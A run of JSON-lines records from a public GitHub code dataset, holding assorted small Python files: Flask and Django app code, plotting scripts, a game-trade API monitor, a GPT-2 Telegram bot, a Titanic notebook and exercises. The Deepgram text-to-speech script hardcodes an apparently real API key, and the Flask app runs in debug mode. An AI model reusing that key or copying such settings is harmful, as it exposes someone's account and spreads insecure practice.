db.session.delete(article)\n db.session.commit()\n\n return redirect('/articles')\n else:\n return 'Object not found!'\n\n\n# comments\n\n@app.route('/article/<int:article_id>', methods=['POST', 'GET'])\ndef create_comment(article_id):\n article = Article.query.filter_by(id=article_id).first()\n\n if request.method == 'POST':\n content = request.form['content']\n\n if not content:\n return 'Comment cannot be empty!!'\n \n comment = Comment(content)\n comment.article = article\n\n db.session.add(comment)\n db.session.commit()\n\n return redirect(f'/articles/{article_id}')\n\n\n@app.route('/articles/<int:article_id>/comments/<int:comment_id>/update', methods=['POST', 'GET'])\ndef update_comment(article_id, comment_id):\n comment = Comment.query.filter_by(id=comment_id).first()\n\n if request.method == 'POST':\n content = request.form['content']\n\n if not content:\n return 'Comment cannot be empty!'\n\n comment.content = content\n db.session.commit()\n\n return redirect(f'/articles/{article_id}')\n\n return render_template('update-comment.html', comment=comment)\n\n\n@app.route('/articles/<int:article_id>/comments/<int:comment_id>/delete')\ndef delete_comment(article_id, comment_id):\n comment = Comment.query.filter_by(id=comment_id).first()\n\n if not comment:\n return 'Object not found!'\n \n db.session.delete(comment)\n db.session.commit()\n\n return redirect(f'/articles/{article_id}')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"AndyLanYT/db_lab3","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43536405987","text":"#sleep no 1. 2 \r\n\r\nimport matplotlib.pyplot as plt \r\nimport numpy as np \r\n\r\n#genrate x values \r\nx = np.linspace(-5,5,100)\r\n#genrate y value using function \r\n\r\ny = np.exp(-x**2)\r\n\r\n\r\n#create 3dplot \r\nfig = plt.figure()\r\nax = fig.add_subplot(111,projection='3d')\r\n\r\nax.plot(x,y,np.zeros_like(x), linestyle= 'dashed', color='green' )\r\n\r\nax.set_xlabel('x')\r\nax.set_ylabel('Y')\r\nax.set_title(' 3d Graph f(x) = e ** -x ** 2')\r\nplt.show()","repo_name":"sachingavalicoding/Backupfiles","sub_path":"PYTHON/plot3d.py","file_name":"plot3d.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35026999804","text":"'''\n@Author: Doncey Albin\n\nConvinience Function for converting jpg to bmp\n'''\nfrom PIL import Image\n\ndef convert_jpg_to_bmp(input_path, output_path):\n try:\n # Open the image\n img = Image.open(input_path)\n\n # Convert the image to RGB mode if it's not already\n if img.mode != \"RGB\":\n img = img.convert(\"RGB\")\n\n # Display some info about the image\n print(f\"Image format: {img.format}\")\n print(f\"Image mode: {img.mode}\")\n print(f\"Image size: {img.size}\")\n\n # Save the image in BMP format\n img.save(output_path, \"BMP\")\n\n except Exception as e:\n print(f\"An error occurred: {e}\")\n\n# Example usage:\nconvert_jpg_to_bmp(\"wooden_crate.jpg\", \"wooden_crate.bmp\")\n","repo_name":"donceykong/BRAR","sub_path":"assets/convert_jpg_bmp.py","file_name":"convert_jpg_bmp.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39832391657","text":"from .testing_utils import MockPainter\nfrom ..graphics_node import GraphicsNode, NodeType\n\n\ndef test_paint():\n painter = MockPainter()\n node = GraphicsNode((1, 1), 5, 'node')\n\n node.paint(painter)\n\n r = 5\n expected = [(1, 1, r, r)]\n\n assert painter.ellipses == expected\n\n\ndef test_paint_labels():\n painter = MockPainter()\n name = 'node'\n node = GraphicsNode((1, 1), 5, name)\n\n node.paint_labels(painter)\n\n # default offset\n expected = [(1 + 5, 1 + 5, name)]\n assert painter.texts == expected\n painter.clear()\n\n # specified offset\n node.paint_labels(painter, offset=0)\n expected = [(1, 1, name)]\n assert painter.texts == expected\n\n\ndef test_type():\n node = GraphicsNode((1, 1), 5, 'node')\n\n assert node.get_type() == NodeType.PRESSURE_NODE\n\n node.set_type(NodeType.COMPONENT_NODE)\n assert node.get_type() == NodeType.COMPONENT_NODE\n\n\ndef test_comparisons():\n node1 = GraphicsNode((1, 1), 5, 'node')\n\n equals = GraphicsNode((1, 1), 5, 'node')\n less = GraphicsNode((1, 1), 5, 'a')\n greater = GraphicsNode((1, 1), 5, 'z')\n\n assert node1 == equals\n assert node1 != less\n assert less < node1\n assert greater > node1\n","repo_name":"waterloo-rocketry/topside","sub_path":"application/plumbing_vis/tests/test_graphics_node.py","file_name":"test_graphics_node.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"73471879521","text":"# exalts.py\n# A simple proof of concept for running live searches of the path of exile trade api \n# exalts.py\n# a python script to monitor the Path of Exile public stash API \n# only looks for specific item names\n# must get a cur_change_id from somewhere to start the process \n\nimport requests \nimport time\nimport sys\nimport datetime\n\n# number of timeouts to allow before program termination\nkillcount = 5\n\n\ndef main():\n # track the number of drinks from the API river\n chunklogger = 0\n\n # configuration variables\n mycharname = \"dummyplaceholdernamegoeshere\"\n ping_rate = 1 # number of seconds to sleep between API requests\n cur_league = \"Harbinger\"\n # end configuration variables\n\n print(\"PoE Trade Monitor booting up...\")\n\n # read from file the most recent cur_change_id written by the program\n river_log = open('ccid', 'r')\n cur_change_id = river_log.readline()\n river_log.close()\n\n target_item = raw_input(\"Hello. Starting at cur_change_id \" + cur_change_id + \".\\nType in the name of the item you are looking for:\\n\\n\")\n # target_item = \"Tabula Rasa\"\n print(\"Great. Let's check the live data stream for \" + target_item + \"...\")\n timetrack = datetime.datetime.now()\n time.sleep(ping_rate)\n\n # continuously monitor the stream of new stash data looking for the item\n while(True):\n # break if the API has failed too many times\n if (killcount <= 0):\n break\n stashcount = 0 \n chunklogger +=1 \n # sanity tries to break if a chunk is too big for some reason; probably redundant now\n sanity = 0\n\n data = get_api_data(cur_change_id)\n if (data == False):\n with open(\"bingo\", \"a\") as myfile:\n myfile.write(\"\\nData retrieval error on data chunk \" + str(chunklogger) + ' at Timestamp: {:%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now()))\n print(\"Data retrieval error, probably an API timeout...\")\n continue\n # get the time between now and the last API call to see how we're doing\n elapsed = datetime.datetime.now() - timetrack\n timetrack = datetime.datetime.now()\n icount = 0\n for stash in data[\"stashes\"]:\n stashcount += 1\n if (stash[\"lastCharacterName\"] == mycharname or stash[\"lastCharacterName\"] == \"sonofsmashington\" or stash[\"lastCharacterName\"] == \"SonOfSmashington\"):\n with open(\"bingo\", \"a\") as myfile:\n myfile.write(\"\\nMy stashes at: \" + cur_change_id + \" \\n\")\n print(\"!!!!!!! ----------- ______ found my own stash ______ ------------- !!!!!!!!!!!!!\")\n if (sanity > 50000):\n break \n for item in stash[\"items\"]:\n if (target_item in item[\"name\"]):\n # if stash[\"public\"] and \"note\" in item and item[\"league\"] == cur_league:\n if stash[\"public\"] and \"note\" in item:\n print(\"-------------------\")\n # print a formatted trade message to actually use in the game if desired\n print(\"@\" + stash[\"lastCharacterName\"] + \" I'd like to buy your \" + target_item + \" from your \" + stash[\"stash\"] + \" stash tab, listed at \" + item[\"note\"] + \" in \" + item[\"league\"] + \" league.\")\n print(\"-------------------\")\n # print (item[\"name\"])\n sanity += 1\n icount += 1\n if (sanity > 50000):\n print (\"50,000 items searched in this chunk but no match was found\")\n break \n cur_change_id = data[\"next_change_id\"]\n print(\"# Checked \" + str(icount) + \" items from \" + str(stashcount) + \" stashes in \" + str(elapsed.seconds) + \" seconds. Checked \" + str(chunklogger) + \" data chunk(s). Next cur_change_id is: \" + cur_change_id)\n # log the next cur_change_id for the next drink from the river, and to use the next time the program is run\n saveloc = open('ccid', 'w')\n saveloc.write(cur_change_id)\n saveloc.close()\n time.sleep(ping_rate)\n # print a quit message if the killcount limit is reached (too many API timeouts)\n print(\"####### Program finished, too many timeouts ocurred! #######\")\n\ndef get_api_data(ccid):\n global killcount\n poeapiurl = \"http://api.pathofexile.com/public-stash-tabs/?id=\"\n try:\n new_stash_data = requests.get(poeapiurl + ccid, timeout = 5)\n if (new_stash_data.status_code != requests.codes.ok):\n print(\"ERROR: http request status code fail! The API request didn't work for some reason (the API might be down?)\")\n return False\n current_chunk = new_stash_data.json()\n return current_chunk\n except:\n killcount -= 1\n print(\"Your API request failed\")\n return False\n \n# run the program\nmain()","repo_name":"eqmvii/poeindexertest","sub_path":"exalts.py","file_name":"exalts.py","file_ext":"py","file_size_in_byte":4893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"551136665","text":"import nltk\nimport json\nfrom pprint import pprint\nfrom operator import itemgetter\nimport matplotlib.pyplot as plt\nimport plotly.plotly as py\nimport plotly\nimport numpy as np\nwith open('tweets.json',encoding='utf-8') as data_file:\n dictionary = json.loads(data_file.read())\nenter_word = input(\"Give the word:\")\nnew_dictionary={}\nfor i in range(0,len(dictionary)):\n input_one = dict(dictionary[i])\n d = int((str(input_one['created_at'])[:7]).replace(\"-\", \"\"))\n m = input_one['text']\n n = nltk.word_tokenize(m)\n for word in n:\n if word == enter_word:\n if d not in new_dictionary:\n new_dictionary[d] = 0\n new_dictionary[d] += 1\npprint(new_dictionary)\n\n\ndatas = []\nnr =[]\nfor item, key in new_dictionary.items():\n datas.append(str(item))\n# print(datas)\ndatas = sorted(datas)\n# print(datas)\ntimp = []\nfor i in range(0, len(datas)):\n nr.append(new_dictionary[int(datas[i])])\n datas[i] = str(datas[i])\n # timp.append(time.strptime(datas[i], \"%Y%m\"))\n\n# pprint(timp)\n# print(datas)\n# print(nr)\n# plt.bar(datas, nr, color=\"blue\")\ny_pos = np.arange(len(datas))\n\nplt.bar(y_pos, nr, align='center', alpha=0.5)\n# plt.plot(datas, nr)\nplt.xticks(y_pos, datas)\nplt.ylabel('Usage')\nplt.xlabel('data')\nplt.title('the use ')\n\nplt.show()\n","repo_name":"MihaiGaidau/lab3","sub_path":"g.py","file_name":"g.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17130069405","text":"from telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nfrom telegram import ChatAction, ParseMode\nfrom functools import wraps\nimport configparser\nimport argparse\nimport logging\nfrom urllib.parse import urlencode\nimport requests\nfrom requests.adapters import HTTPAdapter\nfrom urllib3.util import Retry\nimport re\n\nfrom gpt2bot.model import download_model_folder, download_reverse_model_folder, load_model\nfrom gpt2bot.decoder_wrapper import generateTurn\nfrom gpt2bot.api_wrapper import new_chat, add_message_to_chat_history\n\n# Rule based chat system\nfrom rulebased_bot.rulebased_bot import check_message_intent\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\n# https://github.com/python-telegram-bot/python-telegram-bot/wiki/Code-snippets\n\ndef start_command(update, context):\n context.chat_data['turns'] = []\n active_chat_id = update.message.chat_id\n print(\"CHAT ID:\" + str(active_chat_id))\n update.message.reply_text(\n \"Please give the following number to the researcher that guides your experiment:\" + str(active_chat_id))\n\n\ndef requests_retry_session(\n retries=3,\n backoff_factor=0.3,\n status_forcelist=(500, 502, 504),\n session=None,\n):\n session = session or requests.Session()\n retry = Retry(\n total=retries,\n read=retries,\n connect=retries,\n backoff_factor=backoff_factor,\n status_forcelist=status_forcelist,\n )\n adapter = HTTPAdapter(max_retries=retry)\n session.mount('http://', adapter)\n session.mount('https://', adapter)\n return session\n\n\ndef translate_message_to_gif(message, config):\n # https://engineering.giphy.com/contextually-aware-search-giphy-gets-work-specific/\n params = {\n 'api_key': config.get('chatbot', 'giphy_token'),\n 's': message,\n 'weirdness': config.getint('chatbot', 'giphy_weirdness')\n }\n url = \"http://api.giphy.com/v1/gifs/translate?\" + urlencode(params)\n response = requests_retry_session().get(url)\n return response.json()['data']['images']['fixed_height']['url']\n\n\ndef self_decorator(self, func):\n \"\"\"Passes bot object to func command.\"\"\"\n\n def command_func(update, context, *args, **kwargs):\n return func(self, update, context, *args, **kwargs)\n\n return command_func\n\n\ndef send_action(action):\n \"\"\"Sends `action` while processing func command.\"\"\"\n\n def decorator(func):\n @wraps(func)\n def command_func(self, update, context, *args, **kwargs):\n context.bot.send_chat_action(chat_id=update.effective_message.chat_id, action=action)\n return func(self, update, context, *args, **kwargs)\n\n return command_func\n\n return decorator\n\n\nsend_typing_action = send_action(ChatAction.TYPING)\n\n\ndef gpt_normalize(txt):\n txt = re.sub(r\"[^A-Za-z0-9()\\[\\]:,.!?'“”\\\"]\", \" \", txt) # remove illegal chars\n return ' '.join(txt.strip().split()) # remove unnecessary spaces\n\n\n@send_typing_action\ndef message(self, update, context):\n # Parse parameters\n num_samples = self.config.getint('decoder', 'num_samples')\n max_turns_history = self.config.getint('decoder', 'max_turns_history')\n default_properties = self.config.getboolean('decoder', 'default_properties')\n\n if 'turns' not in context.chat_data:\n context.chat_data['turns'] = []\n turns = context.chat_data['turns']\n\n user_message = update.message.text\n add_message_to_chat_history('user', 0, user_message, default_properties)\n\n if user_message.lower() == 'bye':\n # Restart chat\n context.chat_data['turns'] = []\n update.message.reply_text(\"Bye\")\n add_message_to_chat_history('bot', 0, \"Bye\", default_properties)\n new_chat()\n return None\n\n if default_properties:\n print(\"DEFAULT PROPERTIES ARE ACTIVE\")\n max_turns_history = 2\n rule_based_response = \"\"\n num_samples = 1\n\n else:\n rule_based_response = check_message_intent(user_message.lower())\n\n if rule_based_response is \"\":\n if max_turns_history == 0:\n # If you still get different responses then set seed\n context.chat_data['turns'] = []\n\n bot_message, turns = generateTurn(turns, user_message, max_turns_history, num_samples, self.model,\n self.tokenizer,\n self.config, self.mmi_model,\n self.mmi_tokenizer)\n\n logger.info(f\"{update.effective_message.chat_id} - Bot >>> {bot_message}\")\n\n update.message.reply_text(bot_message)\n add_message_to_chat_history('bot', 0, bot_message, default_properties)\n\n\ndef error(update, context):\n logger.warning(context.error)\n\n\nclass TelegramBot:\n def __init__(self, model, tokenizer, config, mmi_model=None, mmi_tokenizer=None):\n logger.info(\"Initializing the bot...\")\n\n # Set global variables\n self.model = model\n self.tokenizer = tokenizer\n self.mmi_model = mmi_model\n self.mmi_tokenizer = mmi_tokenizer\n self.config = config\n\n # Set up Telegram bot\n self.updater = Updater(config.get('chatbot', 'telegram_token'), use_context=True)\n dp = self.updater.dispatcher\n\n # on different commands - answer in Telegram\n # conversation with bot\n dp.add_handler(MessageHandler(Filters.text, self_decorator(self, message)))\n\n # chatbot settings\n dp.add_handler(CommandHandler('start', start_command))\n\n # log all errors\n dp.add_error_handler(error)\n\n def run_chat(self):\n logger.info(\"Running the chatbot...\")\n\n # Start the Bot\n self.updater.start_polling()\n\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\n # SIGTERM or SIGABRT. This should be used most of the time, since\n # start_polling() is non-blocking and will stop the bot gracefully.\n self.updater.idle()\n\n\ndef main():\n # Script arguments can include path of the config\n arg_parser = argparse.ArgumentParser()\n arg_parser.add_argument('--config', type=str, default=\"gpt2bot/chatbot.cfg\")\n args = arg_parser.parse_args()\n\n # Read the config\n config = configparser.ConfigParser(allow_no_value=True)\n config.read(\"secrets.cfg\")\n with open(args.config) as f:\n config.read_file(f)\n\n # Download and load main model\n target_folder_name = download_model_folder(config)\n model, tokenizer = load_model(target_folder_name, config)\n\n # Download and load reverse model\n use_mmi = config.getboolean('model', 'use_mmi')\n if use_mmi:\n mmi_target_folder_name = download_reverse_model_folder(config)\n mmi_model, mmi_tokenizer = load_model(mmi_target_folder_name, config)\n else:\n mmi_model = None\n mmi_tokenizer = None\n\n # Run Telegram bot\n bot = TelegramBot(model, tokenizer, config, mmi_model=mmi_model, mmi_tokenizer=mmi_tokenizer)\n bot.run_chat()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ubaer/Personalised_context_aware_DialoGPT","sub_path":"gpt2bot/telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":7111,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"38151305686","text":"import json\n\n# compare percentages of poptype, demographic group with median values from box and whisker\nwith open('az/finalboxwhisker/a_cvap.json') as f:\n avg = json.load(f)\nwith open('az/postprocessed/postprocessed.json') as f:\n p = json.load(f)\n\ndistrictpops = []\n# sort districts from lowest to highest population\n# sum of squares of demographic pop from median in box and whisker\nfor districting in p:\n for district in p[districting]['districts']:\n print(district)\n key = 'district' + district\n districtpops.append(p[districting][key]\n [\"asian_cvap\"]/p[districting][key][\"tot_cvap\"])\n break\n break\n # districtpops.append(p[districting][district])\n","repo_name":"matthewjchun/Gerrymanderer","sub_path":"seawulf/mggg_postprocessing/avg_districtings.py","file_name":"avg_districtings.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31958877201","text":"__author__ = 'ylwoi'\n\nclass Sharpie:\n def __init__(self, color, width, ink_amount):\n self.color = color\n self.width = width\n self.ink_amount = ink_amount\n SharpieSet.set.append([self.color, self.ink_amount])\n def use(self):\n self.ink_amount -= 40\n for i in SharpieSet.set:\n if self.color == i[0]:\n i[1] -= 40\n\nclass SharpieSet:\n set = []\n def count_usable(self):\n count = 0\n for i in SharpieSet.set:\n if i[1] > 0:\n count += 1\n return count\n\n def remove_trash(self):\n list2 = []\n for i in SharpieSet.set:\n if i[1] > 0:\n list2.append(i)\n SharpieSet.set = list2\n\nss = SharpieSet()\n\nsharp1 = Sharpie('blue', 120.5, 90)\nsharp2 = Sharpie('yellow', 99.5, 40)\nsharp3 = Sharpie('black', 200, 0)\nsharp4 = Sharpie('white', 150, 80)\nsharp5 = Sharpie('green', 75.5, 0)\n\nprint(SharpieSet.set)\nprint(ss.count_usable())\n\nsharp1.use()\nsharp2.use()\n\nprint(ss.count_usable())\n\nprint(SharpieSet.set)\n\nss.remove_trash()\nprint(SharpieSet.set)","repo_name":"jsdelivrbot/Ylwoi","sub_path":"week04/day_1/sharpie_set.py","file_name":"sharpie_set.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15704412385","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\n\n\n# In[ ]:\n\n\ndataset = pd.read_csv(\"../input/train.csv\") \n\n\n# In[ ]:\n\n\ndataset.head()\n\n\n# In[ ]:\n\n\ndataset[['class1','class2']] = pd.get_dummies(dataset['Pclass'],drop_first=True)\n\n\n# In[ ]:\n\n\ndataset.head()\n\n\n# In[ ]:\n\n\nimport seaborn as sns\ndataset.notnull()\nsns.heatmap(dataset.notnull())\n\n\n# In[ ]:\n\n\n\ndef impute_age(cols):\n Age = cols[0]\n Pclass = cols[1]\n if pd.isnull(Age):\n if Pclass == 1:\n return 37\n elif Pclass == 2:\n return 29\n else:\n return 24\n else:\n return Age\n\n\n# In[ ]:\n\n\ndataset['Age'] = dataset[['Age','Pclass']].apply(impute_age,axis = 1)\n\n\n# In[ ]:\n\n\nsns.heatmap(dataset.isnull())\n\n\n# In[ ]:\n\n\ndataset.drop('Cabin',inplace = True,axis = 1)\n\n\n# In[ ]:\n\n\ndataset['Sex'] = pd.get_dummies(dataset['Sex'],drop_first=True) \n\n\n# In[ ]:\n\n\ndataset.head()\n\n\n# In[ ]:\n\n\nembark = pd.get_dummies(dataset['Embarked'],drop_first = True)\n\n\n# In[ ]:\n\n\n\ndataset.head()\n\n\n# In[ ]:\n\n\ndataset.dropna(inplace = True)\n\n\n# In[ ]:\n\n\nsns.heatmap(dataset.isnull())\n\n\n# In[ ]:\n\n\ndataset = pd.concat([dataset,embark],axis = 1)\n\n\n# In[ ]:\n\n\ndataset.head()\n\n\n# In[ ]:\n\n\ndataset.drop(['PassengerId','Name','Ticket','Embarked'],axis = 1,inplace = True)\n\n\n# In[ ]:\n\n\ndataset.head()\n\n\n# In[ ]:\n\n\nx = dataset.drop('Survived',axis = 1)\nx = x.drop('Pclass',axis = 1)\ny = dataset['Survived']\n\n\n# In[ ]:\n\n\nfrom sklearn.ensemble import RandomForestClassifier\n\n\n# In[ ]:\n\n\nrfc = RandomForestClassifier(n_estimators = 300,criterion = 'entropy')\n\n\n# In[ ]:\n\n\nx.dropna(inplace = True)\n\n\n# In[ ]:\n\n\ny.dropna(inplace = True)\n\n\n# In[ ]:\n\n\nrfc.fit(x,y)\n\n\n# In[ ]:\n\n\ntest = pd.read_csv(\"../input/test.csv\")\n\n\n# In[ ]:\n\n\ntest.head()\n\n\n# In[ ]:\n\n\nembark = pd.get_dummies(test['Embarked'],drop_first=True)\n\n\n# In[ ]:\n\n\nsex = pd.get_dummies(test['Sex'],drop_first=True)\n\n\n# In[ ]:\n\n\ntest.drop(['PassengerId','Name','Sex','Ticket','Cabin','Embarked'],inplace = True,axis = 1)\n\n\n# In[ ]:\n\n\nnew_test = pd.concat([test,sex,embark],axis = 1)\n\n\n# In[ ]:\n\n\nnew_test.head()\n\n\n# In[ ]:\n\n\nnew_test['Age'] = new_test[['Age','Pclass']].apply(impute_age,axis = 1)\n\n\n# In[ ]:\n\n\nsns.heatmap(new_test.isnull())\n\n\n# In[ ]:\n\n\nnew_test['Sex'] = new_test['male']\n\n\n# In[ ]:\n\n\nnew_test.drop('male',axis = 1,inplace = True)\n\n\n# In[ ]:\n\n\nnew_test.head()\n\n\n# In[ ]:\n\n\nx.head()\n\n\n# In[ ]:\n\n\nnew_test[['class1','class2']] = pd.get_dummies(new_test['Pclass'],drop_first = True)\n\n\n# In[ ]:\n\n\nnew_test.head()\n\n\n# In[ ]:\n\n\nnew_test = new_test.drop('Pclass',axis = 1)\n\n\n# In[ ]:\n\n\nsns.heatmap(new_test.notna())\n\n\n# In[ ]:\n\n\nx.head()\n\n\n# In[ ]:\n\n\ntest_set = new_test[['Sex','Age','SibSp','Parch','Fare','class1','class2','Q','S']]\n\n\n# In[ ]:\n\n\nsns.heatmap(test_set.isna())\n\n\n# In[ ]:\n\n\nnp.where(test_set.isna())\n\n\n# In[ ]:\n\n\nnew_test = test_set.fillna(test_set['Fare'].mean())\n\n\n# In[ ]:\n\n\ny_pred = rfc.predict(new_test)\n\n\n# In[ ]:\n\n\ny_pred\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"nischalshrestha/automatic_wat_discovery","sub_path":"Notebooks/py/satheeshrsm/classification-of-passenger/classification-of-passenger.py","file_name":"classification-of-passenger.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"19908002819","text":"from django.db import models as django_models\nfrom budgets.domain import value_objects\nfrom budgets.infrastructure.models import mixins\nfrom django.contrib.auth import get_user_model\n\nUser = get_user_model()\n\n\nclass BudgetBalanceChange(mixins.CreateAndUpdateMixin, django_models.Model):\n amount = django_models.DecimalField(max_digits=8, decimal_places=2)\n budget = django_models.ForeignKey(\n \"budgets.Budget\",\n on_delete=django_models.CASCADE,\n related_name=\"balance_changes\",\n )\n description = django_models.CharField(max_length=256)\n type = django_models.CharField(\n max_length=16, choices=value_objects.BudgetBalanceChangeType.choices()\n )\n category = django_models.CharField(\n max_length=16, choices=value_objects.BudgetBalanceChangeCategory.choices()\n )\n owner = django_models.ForeignKey(\n User, on_delete=django_models.CASCADE, related_name=\"balance_changes\"\n )\n","repo_name":"urbrob/family-budget","sub_path":"budgets/infrastructure/models/budget_balance_change.py","file_name":"budget_balance_change.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39865938524","text":"\"\"\"\nEnvironment Variable handling\n\"\"\"\nimport os\nimport sys\n\nclass Env():\n \"\"\"\n Environment Variable class\n \"\"\"\n def __init__(self):\n # Initialize Variables\n self.env_var:dict = {\n # [key] : [value]\n # key = The environment variable keyword\n # value = the value\n \"DATABASE_PATH\" : \"\",\n \"DATABASE_NAME\" : \"\"\n }\n\n def list_all_Env(self):\n \"\"\"\n List all environment variable keys and values\n \"\"\"\n for k,v in self.env_var.items():\n print(\"{} = {}\".format(k,v))\n\n def get_Value(self, keyword):\n \"\"\"\n Get value of keyword in environment variable dictionary\n \"\"\"\n return self.env_var[keyword]\n\n def source(self):\n \"\"\"\n Source Environment Variables\n \"\"\"\n # Initialize Variables\n env_var = self.env_var\n\n # Loop through all keywords and source\n for k,_ in env_var.items():\n # Get environment variable of keyword\n v = os.environ.get(k)\n\n # Map environment variable keyword to value\n env_var[k] = v\n\n # Replace global variable\n self.env_var = env_var\n\n def source_from_File(self, cfg_file=\"config.txt\"):\n \"\"\"\n Source environment variable from file\n \"\"\"\n # Initialize Variables\n env_var = self.env_var\n\n # Open Configuration File for reading\n with open(cfg_file, \"r\") as read_config:\n # Read file contents\n\n ## Read first line\n line = read_config.readline()\n\n while line != \"\":\n # Still have line\n\n # Split the line into delimiters\n spl_v = line.split()\n\n # Get indexes\n keyword = spl_v[0]\n delimiter = spl_v[1]\n value = spl_v[2]\n\n # Map environment variable keyword to value\n env_var[keyword] = value\n\n # Read next line\n line = read_config.readline()\n\n # Close file after usage\n read_config.close()\n\n # Replace global variable\n self.env_var = env_var\n\n\n","repo_name":"Thanatisia/dev-references","sub_path":"languages/python/libraries/sqlite3/projects/db_create/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"17038875653","text":"import asyncio\nfrom deepgram import Deepgram\nfrom docx import Document\nimport json\n\nDEEPGRAM_API_KEY = 'e9312877e73293d229ed0e89fffc093ca7e420dd'\nTEXT_TO_SPEAK = 'Seu texto aqui'\n\ndocument = Document('saida.docx')\ntext_to_speak = ' '.join([paragraph.text for paragraph in document.paragraphs])\n\nasync def main():\n deepgram = Deepgram(DEEPGRAM_API_KEY)\n\n response = await asyncio.create_task(\n deepgram.text_to_speech(text_to_speak, language='pt')\n )\n\n with open('output_audio.wav', 'wb') as audio_file:\n audio_file.write(response)\n\n print('Texto do arquivo \"saida.docx\" convertido em áudio e salvo em output_audio.wav')\n\ntry:\n asyncio.run(main())\nexcept Exception as e:\n print(f'Erro: {e}')","repo_name":"ASanderO/Leitura-de-PDF","sub_path":"text_to_speech.py","file_name":"text_to_speech.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35189448906","text":"import random as r\n\ndef PlayAgain():\n pin = input(\"Would you like to play again? \\n y/n>>>\")\n if pin == \"y\" or pin == \"Y\":\n RockPaperScissors()\n elif pin == \"n\" or pin == \"N\":\n print(\"returning to main menu...\")\n else:\n print(\"Invalid Response\")\n PlayAgain()\n \ndef RockPaperScissors():\n urmom = r.randint(1,3) \n if urmom == 1:\n urmom = \"rock\"\n elif urmom == 2:\n urmom = \"paper\"\n elif urmom == 3:\n urmom = \"scissors\"\n\n playerinput = int(input(\"Please enter an item:\\n 1.Rock \\n 2.Paper \\n 3.Scissors \\n>>>\"))\n if playerinput == 1:\n playerinput = 'rock'\n elif playerinput == 2:\n playerinput = 'paper'\n elif playerinput == 3:\n playerinput = 'scissors'\n else: \n print(\"Invalid input.\")\n RockPaperScissors()\n \n if playerinput == urmom:\n print(\"You done be committed to a tie...\")\n PlayAgain()\n elif playerinput == \"rock\" and urmom == \"paper\":\n print(f'Player Choice: {playerinput}! \\nComputer choice: {urmom}!')\n print(\"Computer Wins.\")\n PlayAgain()\n elif playerinput == \"paper\" and urmom == \"rock\":\n print(f'Player Choice: {playerinput}! \\nComputer choice: {urmom}!')\n print(\"Player Wins.\")\n PlayAgain()\n elif playerinput == \"scissors\" and urmom == \"rock\":\n print(f'Player Choice: {playerinput}! \\nComputer choice: {urmom}!')\n print(\"Computer Wins.\")\n PlayAgain()\n elif playerinput == \"rock\" and urmom == \"scissors\":\n print(f'Player Choice: {playerinput}! \\nComputer choice: {urmom}!')\n print(\"Player Wins.\")\n PlayAgain()\n elif playerinput == \"paper\" and urmom == \"scissors\":\n print(f'Player Choice: {playerinput}! \\nComputer choice: {urmom}!')\n print(\"Computer Wins.\")\n PlayAgain()\n elif playerinput == \"scissors\" and urmom == \"paper\":\n print(f'Player Choice: {playerinput}! \\nComputer choice: {urmom}!')\n print(\"Player Wins.\")\n PlayAgain()\n\n \n \n \n","repo_name":"ZaneZimmermanCCTI/GroupProject","sub_path":"rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"35358189848","text":"\"\"\"\nConsider a list (list = []). You can perform the following commands:\ninsert i e: Insert integer at position .\nprint: Print the list.\nremove e: Delete the first occurrence of integer .\nappend e: Insert integer at the end of the list.\nsort: Sort the list.\npop: Pop the last element from the list.\nreverse: Reverse the list.\n\n\"\"\"\n\n# ls = []\n# n = int(input())\n\n# for i in range(n):\n# command,*args = input().split()\n# match(command):\n# case 